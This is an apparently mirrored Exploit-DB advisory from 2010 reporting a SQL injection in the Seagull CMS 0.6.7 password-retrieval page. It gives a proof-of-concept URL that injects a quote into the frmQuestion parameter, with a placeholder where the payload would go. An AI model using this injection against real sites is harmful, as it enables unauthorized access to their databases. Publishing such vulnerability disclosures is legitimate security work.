Seagull 0.6.7 – SQL Injection

  • 作者: Sweet
    日期: 2010-08-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14838/
  • 1######################################1
0 Sweet the Algerian Haxxor0
1######################################0
01
1[+]Exploit Title:seagull-0.6.7 SQLinjection Vulnerabilitie0
0[+]Date: 29/08/2010 1
1[+]Author: Sweet0
0[+]Contact : charif38@hotmail.fr0
1[+]Software Link: http://seagullproject.org/0
0[+]Download:1
1[+]Version: 0.6.7 and lesser0
0[+]Tested on: WinXp sp3 1
1[+]Risk : Hight 0
0[+]Description : just another CMS 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


SQL injection : 

in /seagnulPath/www/index.php/user/password with http request editor The POST variable frmQuestion has been set to 1' 

POC:

http://server/index.php/user/password/?action=retrieve&frmEmail=111-222-1933email@address.tst&frmQuestion=1'[SQLI]&frmAnswer=111-222-1933email@address.tst&submitted=retrieve


screen shot:http://img163.imageshack.us/img163/3028/imagexp.jpg



thx to Milw0rm.com , JF - Hamst0r - Keystroke, inj3ct0r.com , exploit-db.com


Saha Ftourkoum et 1,2,3 viva L'Algerie :))
    Python